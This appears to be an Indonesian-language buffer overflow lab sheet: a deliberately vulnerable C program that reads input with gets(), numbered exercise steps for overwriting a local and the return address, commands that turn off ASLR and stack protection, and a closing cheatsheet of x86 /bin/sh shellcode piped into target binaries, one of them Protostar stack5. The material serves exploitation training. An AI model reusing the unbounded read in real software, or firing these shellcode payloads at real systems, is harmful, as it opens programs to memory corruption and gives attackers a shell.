Coba

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

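/*
 * Target of the exercise: nothing in this program calls win(), so seeing
 * its message means control flow was redirected to its address.
 *
 * Declared with (void): an empty parameter list is an obsolescent
 * non-prototype declaration in C.
 */
void win(void)
{
	puts("code flow successfully changed");
}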

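/*
 * Deliberately vulnerable read used as the lab target.
 *
 * Prints the stack address of the local buffer and the address of win() so
 * the reader can compare them with the debugger's view, then reads one line
 * from stdin into a fixed 100-byte buffer with gets(). gets() takes no bound
 * and is the intentional overflow sink of this exercise: a line longer than
 * the buffer writes past it into whatever the compiler placed above it on
 * the stack (other locals such as p, and eventually the saved frame pointer
 * and return address that the exercise steps refer to). The exact layout
 * depends on the compiler and flags, which is why the steps ask you to look
 * at the stack first. Outside the lab, fgets(buffer, sizeof buffer, stdin)
 * is the bounded replacement.
 *
 * Returns 0 always; which message is printed depends on whether p was
 * overwritten with 0xdeadbeef.
 */
int salah(void)
{
	int p = 0;
	char buffer[100];

	/* %p with a void * is the only portable conversion for an address;
	 * %x silently truncates a 64-bit pointer and is undefined behaviour.
	 * Output on 32-bit builds is unchanged (0xbffff7c0-style). */
	printf("alamat buffer : %p\n", (void *)buffer);
	printf("alamat win : %p\n", (void *)win);

	/* INTENTIONAL unbounded read (see header comment). gets() expects a
	 * char *, so pass the array itself rather than its address. gets() was
	 * removed from C11; expect a deprecation/implicit-declaration warning. */
	gets(buffer);

	/* p == 0 unless the input overflowed the buffer into it. */
	if (p == 0xdeadbeef) {
		printf("nilai p sudah berubah : %d\n", p);
	} else {
		printf("belum masuk\n");
	}
	return 0;
}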

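/*
 * Entry point: runs the vulnerable function once. argc/argv are unused;
 * the input for the exercise arrives on stdin, not on the command line.
 */
int main(int argc, char **argv)
{
	(void)argc;
	(void)argv;

	/* salah() always returns 0, so its result is not kept. */
	salah();
	return 0;
}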

Coba :

  1. amati memori stack dan code
  2. amati assembly
  3. ubah nilai fp
  4. ubah nilai fp menjadi 0xdeadbeef
  5. capai return address
  6. arahkan return ke salah() / ke sembarang alamat
  7. arahkan return ke win()
  8. Jalankan shellcode terserah (/bin/bash/ , /usr/bin/cat /etc/passwd , dll)

Run

Disable aslr / randomize memory

cat /proc/sys/kernel/randomize_va_space 
# catat nilai aslinya supaya mudah dikembalikan nanti
echo "0" > /proc/sys/kernel/randomize_va_space

run 32bit

(kode diatas untuk 64bit)

gcc -no-pie -fno-pic -fno-stack-protector -fno-builtin -mpreferred-stack-boundary=2 -m32 -z execstack shellcode.c -o shellcode

run 64bit

gcc -no-pie -fno-pic -fno-stack-protector -fno-builtin -z execstack shellcode.c -o shellcode

Beberapa Cheatsheet

*tidak ada hubungan dengan yang di atas, namun berikut merupakan referensi

shellcode /bin/sh linux/x86 :

'\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
(python -c "import struct; print 'a'*76 + struct.pack('I', 0xbffff7c0) + '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'"; cat) | <file_elf>

(python -c "import struct; print 'a'*76 + struct.pack('I', 0xbffff7c0+30) + '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'"; cat) | <file_elf>

(python -c "import struct; print 'a'*76 + struct.pack('I', 0xbffff7c0+30) + '\x90'*100 + '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'"; cat) | <file_elf>

(python -c "import struct; print 'a'*76 + struct.pack('I', 0xbffff7b0+8) + '\x90' + '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'";cat) | /opt/protostar/bin/stack5